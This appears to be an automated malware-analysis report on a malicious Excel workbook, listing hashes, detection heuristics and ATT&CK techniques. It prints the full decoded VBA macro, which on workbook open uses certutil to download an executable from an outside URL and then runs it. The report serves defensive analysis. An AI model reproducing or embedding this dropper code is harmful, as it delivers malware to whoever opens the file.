Office (OLE) malware analysis — malicious · 51a56eadc35498c0

MALICIOUS

Office (OLE)

25.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2020-12-25

MD5: becdf3d5d008267d766d371ffc706e77 SHA-1: 44d07d4b83bba178a9080d57c54a6c083e4a3536 SHA-256: 51a56eadc35498c028e13e35d258ce1eeaa7d0e01d71f11c0b4693e4da800f75

598 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File T1059.001 PowerShell

The Workbook_Open macro executes a series of commands to download a second-stage payload from 'http://kosahafager.com/tue/mon.exe' using certutil.exe. It then executes the downloaded file, indicating a dropper functionality. The macro also attempts to use WScript.Shell and CreateObject, common for execution and obfuscation.

Heuristics 15

ClamAV: Doc.Dropper.Agent-6935438-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6935438-0
VBA macros detected medium 10 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell (trfutyjnih)
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set eryd = CreateObject("WScript.Shell")
```

LOLBin reference in VBA critical OLE_VBA_LOLBIN

LOLBin reference in VBA

Matched line in script

eryd.Run ("certutil.exe -urlcache -split -f ") & ClipboardText & " " & trfutyjnih, 0, False

Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL

VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script
```
Set eryd = CreateObject("WScript.Shell")
```
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER

The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
Matched line in script
```
Private Sub Workbook_Open()
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set objHTML = CreateObject("htmlfile")
```
Payload URL assembled from a Chr()/Asc() string expression (1 URL) high OLE_VBA_EXPR_DROPPER_URL

A VBA macro builds its stage-2 download URL character by character from string literals concatenated with Chr()/Asc()/StrReverse() results — often nested (Chr(Asc(Chr(Asc("h")))) = "h") and split across the + and & operators, sometimes written out via Print #n, into a second-stage VBScript/PowerShell file. The URL is assembled at run time and never appears contiguously on disk, and there is no numeric array to brute-force, so a literal scan and the array recoverers both miss it. A bounded expression evaluator resolved it; surfaced as an IOC. Self-validating: only a valid host URL that is not already present verbatim in the macro is reported, so a benign macro cannot false-positive.
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("\\systaskk.bbc", "bbc", "exe")
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Reference to certutil (download/decode) high SC_STR_CERTUTIL

Reference to certutil (download/decode)
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://kosahafager.com/tue/mon.bbc Referenced by macro
- http://kosahafager.com/tue/mon.exeReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1427 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1427 bytes
SHA-256: `d82eeb3faec2efc0612e854330da7bf3113e28bc91ad708cc7563badb7160078`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Sub tuemon() End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() ryqe = Replace(("http://kosahafager.com/tue/mon.bbc"), "bbc", "exe") hh = Replace(ryqe, "qsohf", "https://") trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("\\systaskk.bbc", "bbc", "exe") Set objHTML = CreateObject("htmlfile") ff = objHTML.ParentWindow.clipboardData.setData("Text", hh) ClipboardText = objHTML.ParentWindow.clipboardData.GetData("text") Set eryd = CreateObject("WScript.Shell") eryd.Run ("certutil.exe -urlcache -split -f ") & ClipboardText & " " & trfutyjnih, 0, False rthybfhd (60) gj = objHTML.ParentWindow.clipboardData.setData("Text", "") Shell (trfutyjnih) End Sub Sub rthybfhd(sec) Dim temp temp = Timer Do While Timer - temp < sec Loop End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: d82eeb3faec2efc0612e854330da7bf3113e28bc91ad708cc7563badb7160078

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Sub tuemon()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
ryqe = Replace(("http://kosahafager.com/tue/mon.bbc"), "bbc", "exe")
hh = Replace(ryqe, "qsohf", "https://")
trfutyjnih = Environ$(Replace("trfgmprfg", "rfg", "")) & "\" & Replace("\\systaskk.bbc", "bbc", "exe")
Set objHTML = CreateObject("htmlfile")
ff = objHTML.ParentWindow.clipboardData.setData("Text", hh)
ClipboardText = objHTML.ParentWindow.clipboardData.GetData("text")
Set eryd = CreateObject("WScript.Shell")
eryd.Run ("certutil.exe -urlcache -split -f ") & ClipboardText & " " & trfutyjnih, 0, False
rthybfhd (60)
gj = objHTML.ParentWindow.clipboardData.setData("Text", "")
Shell (trfutyjnih)
End Sub

Sub rthybfhd(sec)
    Dim temp
    temp = Timer
    Do While Timer - temp < sec
    Loop
End Sub




Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.